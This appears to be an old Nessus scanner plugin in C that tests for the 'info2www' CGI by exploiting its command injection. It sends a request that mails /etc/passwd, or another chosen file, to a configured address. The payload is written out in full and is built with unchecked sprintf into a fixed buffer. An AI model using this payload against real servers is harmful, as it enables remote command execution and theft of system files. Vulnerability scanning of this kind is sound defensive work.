#include <config.h>
#include <nessuslib.h>
#include <stdio.h>

#ifndef NESSUS_NT
#ifdef HAVE_STRING_H
#include <string.h>
#endif /* HAVE_STRING_H */
#include <sys/types.h>
#include <sys/socket.h> 
#else
#include <windows.h>
#include <string.h>
#endif

#define NAME "info2www"
#define DESC "This plugin determines whether the 'info2www' cgi\n\
is installed on a remote computer. This cgi allows a remote user\n\
to execute any command on a given server\n\n\
Risk factor : high"
#define COPYRIGHT "no copyright"
#define SUMM "determines the presence of the 'info2www' cgi"


PlugExport int plugin_init(struct arglist *desc);
PlugExport int plugin_init(struct arglist *desc)
{
	plug_set_name(desc, NAME);
	plug_set_description(desc, DESC);
	plug_set_summary(desc, SUMM);
	plug_set_copyright(desc, COPYRIGHT);
	plug_set_category(desc, ACT_ATTACK);
	plug_set_family(desc, "CGI abuses");
	return(0);
}

PlugExport int plugin_run(struct arglist * args);	
PlugExport int plugin_run(struct arglist * args)
{
	if(host_get_port_state(args, 80)<=0)return(0);
	
	
	if(is_cgi_installed(args, "info2www"))
	{
	char * test_file = get_preference(args, "test_file");
	char * buffer;
	char * result;
	char * email = get_preference(args, "email");
	int soc;
	if(!email)
	{
	 post_hole(args, 80, "The 'info2www' cgi is present, but could not be tested\
 because you haven't set an email address in nessusd config file");
	 return(0);
	}
	
	soc = open_sock_tcp(args, 80);
	
	
	if(soc<=0)
	 /* Couldn't re-open the connection... Strange !*/
	 post_hole(args, 80, "The 'info2www' cgi is present but could not be tested \
(could not reopen the connection to port 80)");
	else {
		buffer = emalloc(500);
	  	sprintf(buffer, "GET /cgi-bin/info2www?'\
(../../../../../../../bin/mail %s <%s|)'\n", email, test_file?test_file:"/etc/passwd");
		send(soc, buffer, strlen(buffer), 0);
		bzero(buffer, 500);
		recv(soc, buffer, 500,0);
		result = emalloc(strlen(buffer) + 100);
		sprintf(result, "The 'info2www' cgi is installed\n%s sent to %s\n\
Solution : upgrade",test_file?test_file:"/etc/passwd",email);
		efree(&buffer);
		post_hole(args, 80, result);
		efree(&result);
		closesocket(soc);
		}
	}
	return(0);
}

